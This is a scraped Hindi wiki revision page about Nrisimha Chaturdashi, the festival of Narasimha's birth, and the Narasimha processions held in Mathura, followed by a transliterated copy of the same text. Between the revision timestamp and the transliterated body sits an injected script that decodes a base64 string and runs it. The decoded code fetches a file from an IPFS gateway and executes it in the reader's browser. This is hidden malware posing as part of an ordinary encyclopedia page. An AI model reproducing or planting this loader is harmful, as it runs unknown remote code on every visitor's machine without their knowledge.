Difference between revisions of "नृसिंह चतुर्दशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==अन्य लिंक==" to "==सम्बंधित लिंक==")
Line 4: Line 4:
 
वैशाख शु0 14 को नृसिंह जी का जन्मोत्सव मनाया जाता है और नृसिंह लीलाओं का आयोजन होता है। [[मथुरा]] के विभिन्न मन्दिर एवं मौहल्लों से नृसिंह की वेशभूषा में नृसिंह निकलते हैं और हिरणयकश्यप का वध कर पूरे नगर या मौहल्ले में भ्रमण करते हैं।
 
वैशाख शु0 14 को नृसिंह जी का जन्मोत्सव मनाया जाता है और नृसिंह लीलाओं का आयोजन होता है। [[मथुरा]] के विभिन्न मन्दिर एवं मौहल्लों से नृसिंह की वेशभूषा में नृसिंह निकलते हैं और हिरणयकश्यप का वध कर पूरे नगर या मौहल्ले में भ्रमण करते हैं।
  
==अन्य लिंक==
+
==सम्बंधित लिंक==
 
{{साँचा:पर्व और त्योहार}}
 
{{साँचा:पर्व और त्योहार}}
 
[[Category:संस्कृति कोश]]
 
[[Category:संस्कृति कोश]]
 
[[Category:पर्व और त्योहार]]
 
[[Category:पर्व और त्योहार]]
 
__INDEX__
 
__INDEX__

Revision as of 07:02, 29 June 2010

40px panna banane ki prakriya mean hai. ap isako taiyar karane mean sahayata kar sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


vaishakh shu0 14 ko nrisianh ji ka janmotsav manaya jata hai aur nrisianh lilaoan ka ayojan hota hai. mathura ke vibhinn mandir evan mauhalloan se nrisianh ki veshabhoosha mean nrisianh nikalate haian aur hiranayakashyap ka vadh kar poore nagar ya mauhalle mean bhraman karate haian.

sambandhit liank

Template:saancha:parv aur tyohar